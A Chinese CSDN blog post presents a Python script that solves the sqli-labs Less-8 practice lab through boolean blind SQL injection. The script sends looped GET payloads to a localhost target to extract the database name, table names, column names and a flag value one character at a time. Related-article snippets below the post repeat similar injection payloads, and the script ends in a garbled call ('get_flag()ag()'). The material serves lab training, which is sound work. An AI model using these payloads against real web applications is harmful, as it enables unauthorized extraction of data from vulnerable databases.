sql-lab less8 python脚本

最新推荐文章于 2024-07-31 16:42:46 发布
最新推荐文章于 2024-07-31 16:42:46 发布
阅读量78 收藏
点赞数
文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74013288/article/details/134236561
版权
本文介绍了一个使用Python的脚本,通过SQL注入技术来探测并获取数据库名称、表名、字段名以及flag值。该脚本利用`requests`库进行GET请求,逐步猜测ASCII字符来实现对特定数据库的探索。
摘要由CSDN通过智能技术生成 
import requests
import string
url = "http://127.0.0.1/sqlilabs/Less-8/"

def get_dbname():
    db_name = ''
    for i in range(1, 9):
        # 这个遍历是数据库名字的长度如果不够的话就一点一点猜测
        for j in range(32, 127):
            # 32~127是ascii值对应的字符
            payload = "?id=1'and ascii(substr(database(),%d,1))=%d --+" % (i, j)
            # sql注入语句
            url1 = url + payload
            # 获取url(原url+sql语句构造的url)
            res = requests.get(url1)
            # 获取sql注入生成后的页面
            if "You are in..........." in res.text:
                # 因为sql语句执行成功页面会显示You are in……,所以只需判断页面显示内容有You are in……即可
                db_name += chr(j)
                # 获取到的字符写入dn_name方便输出
                print("数据库名称为:" + db_name)


get_dbname()


def get_table():
    table1_name = ''
    table2_name = ''
    table3_name = ''
    table4_name = ''
    for i in range(5):
        # 因为数据库里面有多张表,所以需要再嵌套一个遍历,这个遍历所对应的是limit取值
        for j in range(6):
            for k in range(32, 127):
                payload = "?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit %d,1),%d,1))=%d--+" % (
                i, j, k)
                url2 = url + payload
                res = requests.get(url2)
                if "You are in..........." in res.text:
                    if i == 0:
                        table1_name += chr(k)
                        print("第一个表为:" + table1_name)
                    elif i == 1:
                        table2_name += chr(k)
                        print("第二个表为:" + table2_name)
                    elif i == 2:
                        table3_name += chr(k)
                        print("第三个表为:" + table3_name)
                    elif i == 3:
                        table4_name += chr(k)
                        print("第四个表为:" + table4_name)
                    else:
                        break


get_table()


def get_columns():
    column1 = ''
    column2 = ''
    column3 = ''
    for i in range(3):
        for k in range(1, 9):
            for j in range(32, 127):
                payload = "?id=1'and ascii(substr((select column_name from information_schema.columns where table_name='flag' limit %d,1),%d,1))=%d--+" % (
                i, k, j)
                url3 = url + payload
                res = requests.get(url3)
                if "You are in..........." in res.text:
                    if i == 0:
                        column1 += chr(j)
                        print("第一个字段为->" + column1)
                    elif i == 1:
                        column2 += chr(j)
                        print("第二个字段为->" + column2)
                    elif i == 2:
                        column3 += chr(j)
                        print("第三个字段为->" + column3)
                    else:
                        break


get_columns()


def get_flag():
    flag = ''
    for i in range(30):
        for k in range(32, 127):
            payload = "?id=1'and ascii(substr((select flag from flag),%d,1))=%d--+" % (i, k)
            url4 = url + payload
            res = requests.get(url4)
            if "You are in..........." in res.text:
                flag += chr(k)
                print("flag为->" + flag)


get_flag()ag()
cytoine
关注
Python面试题大全SQLi第八关,Sqli-labs Less-8,Python知识总结
m0_60144796的博客
04-05 352
Python崛起并且风靡,因为优点多、应用领域广、被大牛们认可。学习 Python 门槛很低,但它的晋级路线很多,通过它你能进入机器学习、数据挖掘、大数据,CS等更加高级的领域。Python可以做网络应用,可以做科学计算,数据分析,可以做网络爬虫,可以做机器学习、自然语言处理、可以写游戏、可以做桌面应用…Python可以做的很多,你需要学好基础,再选择明确的方向。这里给大家分享一份全套的 Python 学习资料,给那些想学习 Python 的小伙伴们一点帮助!
sqli-lab简单python实现通关
Williu的博客
01-04 3391
刚开始学习sql注入的菜鸟,简单写下自己的理解,sql注入,肯定和数据库有关系了。利用sql语句来实现对数据库的入侵并获取数据或者破坏。 简单来说就是,利用sql语句来实现欺骗服务器,达到自己的目的。 比如: 我们要登录,需要输入用户名个和密码,然后后台数据库就会select SELECT * FROM users WHERE username = '张三' AND password = '123456' 然后我们改变他的查询方式,利用#或许–注释符 select * from users where u
sqli-labs 第八关盲注python脚本
vt_yjx的博客
05-12 539
目录​编辑判断库名1.库名长度2.库名当大于一个不存在的长度的时候,就不会回显: 但是这个长度存在的话,会返回一个"You are in.........": 所以payload是1' and length(database())>{i}--+ def length(): for i in range(20): payload = f"1' and length(database())>{i}-- " d
sqli-labs(less-1 ~ less-8)
最新发布
m0_64849639的博客
07-31 909
sqli less-1 ~ less-8
sqli-labs lesson8 python 脚本源代码(修复小bug后的版本)
04-29
该源代码是sqli-labs/Less-8所使用到的脚本源代码,运行环境是python3.资源分最低只能选2,我也没办法,或者给我留言也行,本人也是菜鸟一个,无意通过这个收取资源分,哈哈
python脚本SQLlib靶场_Python 是我用过最糟糕的语言之一
weixin_39636691的博客
11-14 190
搜了下知乎居然没有一个吐槽Python的,吐槽js的倒挺多。作为近年在AI加持下大热的语言,我来斗胆吐槽一下,看看是否有人感同身受,也欢迎资深Python程序员反驳start:没有Let等局部变量声明(Scala有block,Haskell,Idris,Ocaml,es6的Let, js的 var),你无法可靠地在局部引入一个变量,一不小心就把全局变量改了。我觉得这个是最无法忍受的。所有绑定都是可...
sqli-labs Less-46、47、48、49(sqli-labs闯关指南 46、47、48、49)—order by 相关注入
m0_54899775的博客
12-28 1170
sqli-labs Less-46、47、48、49(sqli-labs闯关指南 46、47、48、49)—order by 相关注入
python sql注入检测脚本_sql注入脚本
weixin_36484714的博客
02-09 1238
摘要本篇文章对原理的解释占据主要,输出的美化部分不做详细解释一. 成果展示假设我的数据库有这些那么通过sql注入把所有数据库的所有表所有字段和所有的内容查找出来 二. 原理对sql-labs的前四关有效,其实程序是根据sqli-lab的特点而不是像强大的工具sqlmap一样可以完全实现sql注入,而今天的核心就在于三个表达式select * from users where id='-1' uni...
网络安全-sqlmap实战之sqlilabs-Less11_less11的sql注入用sqlmap将数据库dump
2401_84248681的博客
04-29 246
错误回显sql语句猜测。
sqli-labs Less-8
qq_42630215的博客
03-13 1396
Less-8 Get - Blind -Boolian Based -Single Quotes 1.原页面 2.?id=1 3.?id=1’ 4.尝试布尔盲注 代码存在sql注入漏洞,然而页面既不会回显数据,也不会回显错误信息,我们可以通过构造语句,来判断数据库信息的正确性,再通过页面的“真”和“假”来识别我们判断的是否正确 ?id=1’ and (length(database()))&gt...
python脚本SQLlib靶场_Python爬虫与反反爬虫实践
weixin_39545895的博客
10-21 309
因为要收集数据,所以打算自己撸一个爬虫,期间碰到网站的反爬措施,让我非常头疼,在此记录一下。基础爬虫的基础是不需要自己手动通过浏览器访问网页,而是通过程序构造网络请求,获取网站返回的结果。例如使用python的requests库发送请求:import 得到返回的html代码后,可以自己解析数据,获取感兴趣的内容。前期分析首先分析要爬的网站,本质是一个信息查询系统,提供了搜索页面。例如我想获取某个c...
Python脚本--SQL盲注
m0_62202418的博客
11-26 438
【代码】Python脚本--SQL盲注。
SQL布尔盲注_sqli-labs_08通过布尔盲注,获取数据库名字
weixin_42786460的博客
08-30 201
SQL布尔盲注
Blind SQL Injection
Nixawk
04-23 1383
https://www.owasp.org/index.php/Blind_SQL_Injection
Sqli-labs闯关详解带python脚本详解
westlife
10-24 3136
Sqli-labs-less1 *作为一个萌新小白,学了一段时间的python和web安全类的知识,打算写一点东西记录自己的成长。 尽量每一个关卡都利用python不同的风骚姿势。* ![shabi](https://img-blog.csdn.net/20181024192015475?watermark/2/text/aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl...
SQL注入学习——Bool盲注详解 sqli-labs(Less 8)
未完成的歌~的博客
07-29 6567
Less-7导出文件GET字符型注 打开页面输入?id=1 试了很多发现报错信息都一样,查看下源代码: if($row) { echo '<font color= "#FFFF00">'; echo 'You are in.... Use outfile......'; echo "<br>"; echo "</font>"; ......
SQLI-LAB  的 实战记录(Less 1 - Less 10)
这块盾牌有待改良
07-15 3924
Less - 1 Error Based- String Less - 2 Error Based- Intiger Less - 3 Error Based- String with Twist
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值